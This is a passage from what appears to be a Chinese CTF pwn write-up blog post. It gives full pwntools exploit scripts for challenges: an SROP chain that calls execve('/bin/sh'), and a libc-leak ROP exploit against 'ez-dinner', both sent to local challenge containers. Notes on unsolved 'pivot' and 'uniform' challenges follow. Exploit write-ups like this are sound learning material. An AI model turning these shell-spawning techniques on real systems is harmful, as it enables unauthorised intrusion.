<p>sigreturn会破坏原有的ROP链，很显然原有的rsp rbp都丢掉了，所以第一轮利用之后需要重新布置栈，需要把rip改到read函数处再读一遍，buf改到可控的地方，构建出新的ROP链，也就是再read一遍15字节触发sigreturn把binsh的地址等等传进去，完美<code>cat flag</code></p>
<p>最后一轮的rsp需要设置成一个安全的值，否则归0会崩溃，栈迁移的经验告诉我不一定非得是0x7ff开头的地方</p>
<pre class="line-numbers language-python" data-language="python"><code class="language-python"><span class="token keyword">from</span> pwn <span class="token keyword">import</span> <span class="token operator">*</span>

context<span class="token punctuation">(</span>arch<span class="token operator">=</span><span class="token string">'amd64'</span><span class="token punctuation">,</span> os<span class="token operator">=</span><span class="token string">'linux'</span><span class="token punctuation">,</span> log_level<span class="token operator">=</span><span class="token string">'debug'</span><span class="token punctuation">)</span>

context<span class="token punctuation">.</span>terminal <span class="token operator">=</span> <span class="token punctuation">[</span><span class="token string">'tmux'</span><span class="token punctuation">,</span> <span class="token string">'splitw'</span><span class="token punctuation">,</span> <span class="token string">'-h'</span><span class="token punctuation">]</span>

read_addr <span class="token operator">=</span> <span class="token number">0x40106A</span>
write_addr <span class="token operator">=</span> <span class="token number">0x401072</span>
ret_addr <span class="token operator">=</span> <span class="token number">0x401035</span>
system_addr <span class="token operator">=</span> <span class="token number">0x040106F</span>
fail_data <span class="token operator">=</span> <span class="token number">0x402000</span>

p_data <span class="token operator">=</span> <span class="token number">0x402008</span>
<span class="token comment">#io = process("./pwn")</span>

io <span class="token operator">=</span> connect<span class="token punctuation">(</span><span class="token string">"host.docker.internal"</span><span class="token punctuation">,</span><span class="token number">49133</span><span class="token punctuation">)</span>
io<span class="token punctuation">.</span>recvuntil<span class="token punctuation">(</span><span class="token string">b"now!"</span><span class="token punctuation">)</span>

frame1 <span class="token operator">=</span> SigreturnFrame<span class="token punctuation">(</span><span class="token punctuation">)</span>
frame1<span class="token punctuation">.</span>rax <span class="token operator">=</span> <span class="token number">0</span>                  <span class="token comment"># read</span>
frame1<span class="token punctuation">.</span>rdi <span class="token operator">=</span> <span class="token number">0</span>                  <span class="token comment"># stdin</span>
frame1<span class="token punctuation">.</span>rsi <span class="token operator">=</span> fail_data          <span class="token comment"># 写目标</span>
frame1<span class="token punctuation">.</span>rdx <span class="token operator">=</span> <span class="token number">0x140</span>                  
frame1<span class="token punctuation">.</span>rip <span class="token operator">=</span> read_addr          <span class="token comment"># 执行 read</span>
frame1<span class="token punctuation">.</span>rsp <span class="token operator">=</span> p_data


frame2 <span class="token operator">=</span> SigreturnFrame<span class="token punctuation">(</span><span class="token punctuation">)</span>
frame2<span class="token punctuation">.</span>rax <span class="token operator">=</span> <span class="token number">59</span>                  <span class="token comment"># execve</span>
frame2<span class="token punctuation">.</span>rdi <span class="token operator">=</span> fail_data           <span class="token comment"># /bin/sh\x00</span>
<span class="token comment">#frame2.rdx = 0</span>
frame2<span class="token punctuation">.</span>rip <span class="token operator">=</span> system_addr          <span class="token comment"># system</span>
frame2<span class="token punctuation">.</span>rsp <span class="token operator">=</span> p_data             <span class="token comment">#随便写一个</span>

payload <span class="token operator">=</span> <span class="token string">b"A"</span><span class="token operator">*</span> <span class="token punctuation">(</span><span class="token number">16</span> <span class="token operator">+</span> <span class="token number">8</span><span class="token punctuation">)</span> <span class="token comment">#24</span>

payload <span class="token operator">+=</span> p64<span class="token punctuation">(</span>read_addr<span class="token punctuation">)</span>
payload <span class="token operator">+=</span> p64<span class="token punctuation">(</span>system_addr<span class="token punctuation">)</span> 
payload <span class="token operator">+=</span> <span class="token builtin">bytes</span><span class="token punctuation">(</span>frame1<span class="token punctuation">)</span>

io<span class="token punctuation">.</span>send<span class="token punctuation">(</span>payload<span class="token punctuation">)</span>
time<span class="token punctuation">.</span>sleep<span class="token punctuation">(</span><span class="token number">1</span><span class="token punctuation">)</span>

io<span class="token punctuation">.</span>send<span class="token punctuation">(</span><span class="token string">b"A"</span><span class="token operator">*</span><span class="token number">15</span><span class="token punctuation">)</span>
time<span class="token punctuation">.</span>sleep<span class="token punctuation">(</span><span class="token number">1</span><span class="token punctuation">)</span>


new_stack <span class="token operator">=</span> <span class="token string">b"/bin/sh\x00"</span>
new_stack <span class="token operator">+=</span> p64<span class="token punctuation">(</span>read_addr<span class="token punctuation">)</span>
new_stack <span class="token operator">+=</span> p64<span class="token punctuation">(</span>system_addr<span class="token punctuation">)</span> 
new_stack <span class="token operator">+=</span> <span class="token builtin">bytes</span><span class="token punctuation">(</span>frame2<span class="token punctuation">)</span>

io<span class="token punctuation">.</span>send<span class="token punctuation">(</span>new_stack<span class="token punctuation">)</span>

payload2 <span class="token operator">=</span> <span class="token string">b"/bin/sh"</span> <span class="token operator">+</span> <span class="token string">b"\x00"</span><span class="token operator">*</span><span class="token number">8</span>

time<span class="token punctuation">.</span>sleep<span class="token punctuation">(</span><span class="token number">1</span><span class="token punctuation">)</span>
<span class="token comment">#gdb.attach(io)</span>
io<span class="token punctuation">.</span>send<span class="token punctuation">(</span>payload2<span class="token punctuation">)</span>

io<span class="token punctuation">.</span>interactive<span class="token punctuation">(</span><span class="token punctuation">)</span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<h2 id="ez-dinner">ez-dinner</h2>
<p>两个函数</p>
<pre class="line-numbers language-c" data-language="c"><code class="language-c"><span class="token keyword">int</span> __fastcall <span class="token function">main</span><span class="token punctuation">(</span><span class="token keyword">int</span> argc<span class="token punctuation">,</span> <span class="token keyword">const</span> <span class="token keyword">char</span> <span class="token operator">*</span><span class="token operator">*</span>argv<span class="token punctuation">,</span> <span class="token keyword">const</span> <span class="token keyword">char</span> <span class="token operator">*</span><span class="token operator">*</span>envp<span class="token punctuation">)</span>
<span class="token punctuation">&#123;</span>
  <span class="token function">Myinit</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
  <span class="token function">puts</span><span class="token punctuation">(</span><span class="token string">"Welcome to ldz's Ciber-Stack-Dinner!"</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
  <span class="token function">puts</span><span class="token punctuation">(</span><span class="token string">"Today's special: Segmentation fault or maybe Nothing happened — served with a stack sauce."</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
  <span class="token function">puts</span><span class="token punctuation">(</span><span class="token string">"Don't worry, we saved your return address... maybe..."</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
  <span class="token function">func1</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
  <span class="token function">func2</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
  <span class="token keyword">return</span> <span class="token number">0</span><span class="token punctuation">;</span>
<span class="token punctuation">&#125;</span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<p>再仔细一看</p>
<pre class="line-numbers language-c" data-language="c"><code class="language-c"><span class="token keyword">int</span> <span class="token function">func1</span><span class="token punctuation">(</span><span class="token punctuation">)</span>
<span class="token punctuation">&#123;</span>
  _QWORD buf<span class="token punctuation">[</span><span class="token number">2</span><span class="token punctuation">]</span><span class="token punctuation">;</span> <span class="token comment">// [rsp+0h] [rbp-110h] BYREF</span>
  <span class="token keyword">char</span> v2<span class="token punctuation">[</span><span class="token number">240</span><span class="token punctuation">]</span><span class="token punctuation">;</span> <span class="token comment">// [rsp+10h] [rbp-100h] BYREF</span>
  <span class="token keyword">char</span> <span class="token operator">*</span>v3<span class="token punctuation">;</span> <span class="token comment">// [rsp+100h] [rbp-10h]</span>
  <span class="token keyword">int</span> v4<span class="token punctuation">;</span> <span class="token comment">// [rsp+10Ch] [rbp-4h]</span>

  <span class="token function">puts</span><span class="token punctuation">(</span><span class="token string">"So please show me your dinner Admission ticket."</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
  v4 <span class="token operator">=</span> <span class="token function">read</span><span class="token punctuation">(</span><span class="token number">0</span><span class="token punctuation">,</span> buf<span class="token punctuation">,</span> <span class="token number">0x100u</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
  <span class="token keyword">if</span> <span class="token punctuation">(</span> v4 <span class="token operator">==</span> <span class="token operator">-</span><span class="token number">1</span> <span class="token punctuation">)</span>
    <span class="token keyword">return</span> <span class="token function">puts</span><span class="token punctuation">(</span><span class="token string">"You are not authorized to attend this dinner."</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
  <span class="token function">printf</span><span class="token punctuation">(</span><span class="token string">"Name: %lx\n"</span><span class="token punctuation">,</span> buf<span class="token punctuation">[</span><span class="token number">0</span><span class="token punctuation">]</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
  <span class="token function">printf</span><span class="token punctuation">(</span><span class="token string">"Age:  %lx\n"</span><span class="token punctuation">,</span> buf<span class="token punctuation">[</span><span class="token number">1</span><span class="token punctuation">]</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
  v3 <span class="token operator">=</span> v2<span class="token punctuation">;</span>
  <span class="token keyword">return</span> <span class="token function">printf</span><span class="token punctuation">(</span><span class="token string">"Description: %.*s\n"</span><span class="token punctuation">,</span> <span class="token number">240</span><span class="token punctuation">,</span> v2<span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token punctuation">&#125;</span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<p>没有栈溢出，但是有输出，可能会泄露出什么，继续看func2</p>
<pre class="line-numbers language-c" data-language="c"><code class="language-c"><span class="token keyword">int</span> <span class="token function">func2</span><span class="token punctuation">(</span><span class="token punctuation">)</span>
<span class="token punctuation">&#123;</span>
  <span class="token keyword">int</span> v1<span class="token punctuation">;</span> <span class="token comment">// [rsp+Ch] [rbp-64h] BYREF</span>
  _QWORD buf<span class="token punctuation">[</span><span class="token number">11</span><span class="token punctuation">]</span><span class="token punctuation">;</span> <span class="token comment">// [rsp+10h] [rbp-60h] BYREF</span>
  <span class="token keyword">int</span> v3<span class="token punctuation">;</span> <span class="token comment">// [rsp+68h] [rbp-8h]</span>
  <span class="token keyword">int</span> i<span class="token punctuation">;</span> <span class="token comment">// [rsp+6Ch] [rbp-4h]</span>

  <span class="token function">puts</span><span class="token punctuation">(</span><span class="token string">"How many dishes would u like to eat?"</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
  <span class="token function">__isoc99_scanf</span><span class="token punctuation">(</span><span class="token string">"%1d"</span><span class="token punctuation">,</span> <span class="token operator">&amp;</span>v1<span class="token punctuation">)</span><span class="token punctuation">;</span>
  <span class="token function">puts</span><span class="token punctuation">(</span><span class="token string">"Okey, then What would you like to eat?"</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
  <span class="token function">read</span><span class="token punctuation">(</span><span class="token number">0</span><span class="token punctuation">,</span> buf<span class="token punctuation">,</span> <span class="token number">8LL</span> <span class="token operator">*</span> v1<span class="token punctuation">)</span><span class="token punctuation">;</span>
  <span class="token keyword">for</span> <span class="token punctuation">(</span> i <span class="token operator">=</span> <span class="token number">0</span><span class="token punctuation">;</span> buf<span class="token punctuation">[</span>i<span class="token punctuation">]</span> <span class="token operator">&amp;&amp;</span> buf<span class="token punctuation">[</span>i<span class="token punctuation">]</span> <span class="token operator">!=</span> <span class="token number">10</span> <span class="token operator">&amp;&amp;</span> i <span class="token operator">&lt;</span> v1<span class="token punctuation">;</span> <span class="token operator">++</span>i <span class="token punctuation">)</span>
    v3 <span class="token operator">+=</span> buf<span class="token punctuation">[</span>i<span class="token punctuation">]</span><span class="token punctuation">;</span>
  <span class="token function">puts</span><span class="token punctuation">(</span><span class="token string">"Cooking ..."</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
  <span class="token function">sleep</span><span class="token punctuation">(</span><span class="token number">1u</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
  <span class="token function">puts</span><span class="token punctuation">(</span><span class="token string">"The food is served.\nWish you a happy meal!"</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
  i <span class="token operator">=</span> v3 <span class="token operator">%</span> <span class="token number">3</span><span class="token punctuation">;</span>
  <span class="token keyword">if</span> <span class="token punctuation">(</span> <span class="token operator">!</span><span class="token punctuation">(</span>v3 <span class="token operator">%</span> <span class="token number">3</span><span class="token punctuation">)</span> <span class="token punctuation">)</span>
    <span class="token keyword">return</span> <span class="token function">food1</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
  <span class="token keyword">if</span> <span class="token punctuation">(</span> i <span class="token operator">==</span> <span class="token number">1</span> <span class="token punctuation">)</span>
    <span class="token keyword">return</span> <span class="token function">food2</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
  <span class="token keyword">return</span> <span class="token function">food3</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token punctuation">&#125;</span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<p>要找栈溢出只能从<code>read(0, buf, 8LL * v1);</code>入手，scanf(“%1d”, &amp;v1);强制只能读入一个字节，表面上只能读入0-9实际上如果输入非法字符会被拒收，这样v1就是未初始化的，而func1恰好可以往栈上写入很多东西，于是借此机会把v1改成大数，于是栈溢出就有了</p>
<p>没有后门函数和syscall，给了libc，显然接下来要想办法搞到libc的基址正好可以利用func1的泄露，如果输入没有覆盖，岂不是会读到未定义的东西，试了一下果然出现了libc里的函数地址</p>
<p>接下来就简单了，第二轮的func1没碰太多栈，于是再次进入func2，v1还是未初始化的值，栈溢出依然存在，于是顺理成章ROP即可</p>
<p>一个坑点是，func1的输入<code>\n</code>，由于算输入非法，输入内容没有被接收就还停留在缓冲区里等着下一次输入，然后进了scanf，导致payload被本来发给scanf的字符截胡，可气的是出现了本地gdb里能跑通，退出gdb就跑不通的诡异情况，好一顿排查……其实没有，一调试就是成功，偶然注意到输入输出不对劲才反应过来，gdb把两次输入拼到了一起，而本地和远程都没有！</p>
<pre class="line-numbers language-python" data-language="python"><code class="language-python"><span class="token keyword">from</span> pwn <span class="token keyword">import</span> <span class="token operator">*</span>

context<span class="token punctuation">(</span>arch<span class="token operator">=</span><span class="token string">'amd64'</span><span class="token punctuation">,</span> os<span class="token operator">=</span><span class="token string">'linux'</span><span class="token punctuation">,</span> log_level<span class="token operator">=</span><span class="token string">'debug'</span><span class="token punctuation">)</span>

context<span class="token punctuation">.</span>terminal <span class="token operator">=</span> <span class="token punctuation">[</span><span class="token string">'tmux'</span><span class="token punctuation">,</span> <span class="token string">'splitw'</span><span class="token punctuation">,</span> <span class="token string">'-h'</span><span class="token punctuation">]</span>

ret_addr <span class="token operator">=</span> <span class="token number">0x40129E</span>

binsh <span class="token operator">=</span> <span class="token number">0x4022A3</span>

call_1 <span class="token operator">=</span> <span class="token number">0x4015C6</span>
bss_addr <span class="token operator">=</span> <span class="token number">0x4040A0</span> <span class="token operator">+</span> <span class="token number">0x100</span>
<span class="token comment"># 连接目标</span>

<span class="token comment">#p = process('./dinner')</span>

p <span class="token operator">=</span> connect<span class="token punctuation">(</span><span class="token string">"host.docker.internal"</span><span class="token punctuation">,</span><span class="token number">51040</span><span class="token punctuation">)</span>

libc <span class="token operator">=</span> ELF<span class="token punctuation">(</span><span class="token string">'./libc.so.6'</span><span class="token punctuation">)</span>

elf <span class="token operator">=</span> ELF<span class="token punctuation">(</span><span class="token string">'./dinner'</span><span class="token punctuation">)</span>

rop <span class="token operator">=</span> ROP<span class="token punctuation">(</span>libc<span class="token punctuation">)</span>

puts_got <span class="token operator">=</span> elf<span class="token punctuation">.</span>got<span class="token punctuation">[</span><span class="token string">'puts'</span><span class="token punctuation">]</span>

pop_rdi_ret_offset <span class="token operator">=</span> rop<span class="token punctuation">.</span>find_gadget<span class="token punctuation">(</span><span class="token punctuation">[</span><span class="token string">'pop rdi'</span><span class="token punctuation">,</span> <span class="token string">'ret'</span><span class="token punctuation">]</span><span class="token punctuation">)</span><span class="token punctuation">[</span><span class="token number">0</span><span class="token punctuation">]</span>

system_offset <span class="token operator">=</span> libc<span class="token punctuation">.</span>symbols<span class="token punctuation">[</span><span class="token string">'system'</span><span class="token punctuation">]</span>

puts_offset <span class="token operator">=</span> libc<span class="token punctuation">.</span>symbols<span class="token punctuation">[</span><span class="token string">'puts'</span><span class="token punctuation">]</span>

<span class="token comment"># 阶段1：设置 v1 残留值</span>

payload1 <span class="token operator">=</span>  <span class="token string">b'A'</span> <span class="token operator">*</span> <span class="token number">0xac</span>  <span class="token comment"># 填充到 v1 位置 (172 字节)</span>

payload1 <span class="token operator">+=</span> p32<span class="token punctuation">(</span><span class="token number">50</span><span class="token punctuation">)</span>

payload1 <span class="token operator">+=</span> <span class="token string">b'B'</span> <span class="token operator">*</span> <span class="token punctuation">(</span><span class="token number">256</span> <span class="token operator">-</span> <span class="token number">0xac</span> <span class="token operator">-</span> <span class="token number">4</span><span class="token punctuation">)</span>  <span class="token comment"># 填充剩余</span>

p<span class="token punctuation">.</span>recvuntil<span class="token punctuation">(</span><span class="token string">b"ticket."</span><span class="token punctuation">)</span>

p<span class="token punctuation">.</span>send<span class="token punctuation">(</span>payload1<span class="token punctuation">)</span>

<span class="token comment"># 阶段2：让 scanf 失败</span>

p<span class="token punctuation">.</span>recvuntil<span class="token punctuation">(</span><span class="token string">b"How many dishes would u like to eat?"</span><span class="token punctuation">)</span>
<span class="token comment">#gdb.attach(p)</span>
p<span class="token punctuation">.</span>send<span class="token punctuation">(</span><span class="token string">b'a'</span><span class="token punctuation">)</span>  <span class="token comment"># 非数字输入，scanf 失败</span>

<span class="token comment">#第三步，回到开头泄露地址</span>

payload2 <span class="token operator">=</span> <span class="token string">b'B'</span> <span class="token operator">+</span> <span class="token string">b'C'</span> <span class="token operator">*</span> <span class="token number">87</span>   <span class="token comment"># 填满 buf[11]</span>

payload2 <span class="token operator">+=</span> <span class="token string">b'D'</span> <span class="token operator">*</span> <span class="token number">8</span>   <span class="token comment"># 填充</span>

payload2 <span class="token operator">+=</span> p64<span class="token punctuation">(</span>bss_addr<span class="token punctuation">)</span>   <span class="token comment"># 填充rbp</span>

payload2 <span class="token operator">+=</span> p64<span class="token punctuation">(</span>call_1<span class="token punctuation">)</span>

p<span class="token punctuation">.</span>recvuntil<span class="token punctuation">(</span><span class="token string">b"What would you like to eat?"</span><span class="token punctuation">)</span>

p<span class="token punctuation">.</span>sendline<span class="token punctuation">(</span>payload2<span class="token punctuation">)</span>

<span class="token comment">#第四步，跳过输入，泄露</span>

p<span class="token punctuation">.</span>recvuntil<span class="token punctuation">(</span><span class="token string">b"ticket."</span><span class="token punctuation">)</span>

p<span class="token punctuation">.</span>send<span class="token punctuation">(</span><span class="token string">b'\n'</span><span class="token punctuation">)</span>

p<span class="token punctuation">.</span>recv<span class="token punctuation">(</span><span class="token number">1</span><span class="token punctuation">)</span>

name <span class="token operator">=</span> p<span class="token punctuation">.</span>recvline<span class="token punctuation">(</span><span class="token punctuation">)</span>

age_line <span class="token operator">=</span> p<span class="token punctuation">.</span>recvline<span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">.</span>strip<span class="token punctuation">(</span><span class="token punctuation">)</span>

<span class="token keyword">print</span><span class="token punctuation">(</span><span class="token string">"age:"</span><span class="token punctuation">,</span>age_line<span class="token punctuation">)</span>

age_hex <span class="token operator">=</span> age_line<span class="token punctuation">.</span>decode<span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">.</span>split<span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">[</span><span class="token operator">-</span><span class="token number">1</span><span class="token punctuation">]</span>

age <span class="token operator">=</span> <span class="token builtin">int</span><span class="token punctuation">(</span>age_hex<span class="token punctuation">,</span> <span class="token number">16</span><span class="token punctuation">)</span>

system <span class="token operator">=</span>  age <span class="token operator">+</span> <span class="token number">0x64750</span> <span class="token operator">-</span> <span class="token number">0x9eef3</span>

libc_base <span class="token operator">=</span> system <span class="token operator">-</span> system_offset

pop_rdi_ret <span class="token operator">=</span> libc_base <span class="token operator">+</span> pop_rdi_ret_offset

<span class="token comment"># 第五步，跳过</span>

p<span class="token punctuation">.</span>recvuntil<span class="token punctuation">(</span><span class="token string">b"How many dishes would u like to eat?"</span><span class="token punctuation">)</span>

<span class="token comment">#p.send(b'a')</span>

payload3 <span class="token operator">=</span> <span class="token string">b'C'</span> <span class="token operator">*</span> <span class="token number">88</span>   <span class="token comment"># 填满 buf[11]</span>

payload3 <span class="token operator">+=</span> <span class="token string">b'D'</span> <span class="token operator">*</span> <span class="token number">8</span>   <span class="token comment"># 填充</span>

<span class="token comment">#payload3 += b'E' * 8    # 填充rbp</span>

payload3 <span class="token operator">+=</span> p64<span class="token punctuation">(</span>ret_addr<span class="token punctuation">)</span>

payload3 <span class="token operator">+=</span> p64<span class="token punctuation">(</span>ret_addr<span class="token punctuation">)</span>

payload3 <span class="token operator">+=</span> p64<span class="token punctuation">(</span>pop_rdi_ret<span class="token punctuation">)</span>

payload3 <span class="token operator">+=</span> p64<span class="token punctuation">(</span>binsh<span class="token punctuation">)</span>

payload3 <span class="token operator">+=</span> p64<span class="token punctuation">(</span>system<span class="token punctuation">)</span>

p<span class="token punctuation">.</span>recvuntil<span class="token punctuation">(</span><span class="token string">b"Okey, then What would you like to eat?"</span><span class="token punctuation">)</span>
<span class="token comment">#gdb.attach(p)</span>
p<span class="token punctuation">.</span>sendline<span class="token punctuation">(</span>payload3<span class="token punctuation">)</span>

<span class="token keyword">print</span><span class="token punctuation">(</span><span class="token string">"system:"</span><span class="token punctuation">,</span><span class="token builtin">hex</span><span class="token punctuation">(</span>system<span class="token punctuation">)</span><span class="token punctuation">)</span>

<span class="token keyword">print</span><span class="token punctuation">(</span><span class="token string">"pop_rdi"</span><span class="token punctuation">,</span><span class="token builtin">hex</span><span class="token punctuation">(</span>pop_rdi_ret<span class="token punctuation">)</span><span class="token punctuation">)</span>

p<span class="token punctuation">.</span>interactive<span class="token punctuation">(</span><span class="token punctuation">)</span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<h2 id="pivot">pivot</h2>
<p>简洁至极的程序，除了libc和16字节的栈溢出真就什么都没有。如果给个pop rdi ret的gadget就可以很舒适地调用puts泄露libc基地址，栈迁移重新ROP，然而啥也没有。</p>
<p>尝试迁移后直接puts泄露got表，但是没有成功，疑似是<code>RELRO: Full RELRO</code>干的好事</p>
<p>尝试学习ret2dl-resolve，并没有掌握于是未果</p>
<h2 id="uniform">uniform</h2>
<p>能看得出是UAF漏洞，但是涉及堆，还没学过，本来想pivot解完去学的，结果卡死了，不会</p>
</div>

      
        <div class="article-tags">
          <a href="/tags/pwn/"># pwn</a>
        </div>
      

      <nav class="post-nav" aria-label="相邻文章">
        <a class="post-nav-item prev" href="/2025/10/13/%E6%95%B0%E6%8D%AE%E7%BB%93%E6%9E%84-%E6%A0%88%E5%AE%9E%E9%AA%8C/"><span>上一篇</span><strong>数据结构-栈实验</strong></a>
        <a class="post-nav-item next" href="/2025/09/28/%E6%95%B0%E6%8D%AE%E7%BB%93%E6%9E%84-%E9%93%BE%E8%A1%A8%E5%AE%9E%E9%AA%8C/"><span>下一篇</span><strong>数据结构_链表实验</strong></a>
      </nav>
    </div>

    <aside class="post-toc" id="post-toc" aria-label="文章目录" hidden>
      <div class="post-toc-inner">
        <header><span>ON THIS PAGE</span><strong id="post-toc-count">00</strong></header>
        <nav class="post-toc-nav" id="post-toc-nav"></nav>
        <div class="post-toc-progress"><i id="post-toc-progress"></i></div>
      </div>
    </aside>
  </div>
</article>

    </main>

    <footer class="site-footer">
  <div class="footer-inner">
    <div>
      © 2025–2026
      Auceptin
    </div>
    <div>Built with Hexo · Paradise Lost</div>
  </div>
</footer>

    <button class="back-to-top" id="back-to-top" type="button" aria-label="返回顶部">↑</button>
    <script src="/js/theme.js"></script>
    
      <script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
    
  </body>
</html>
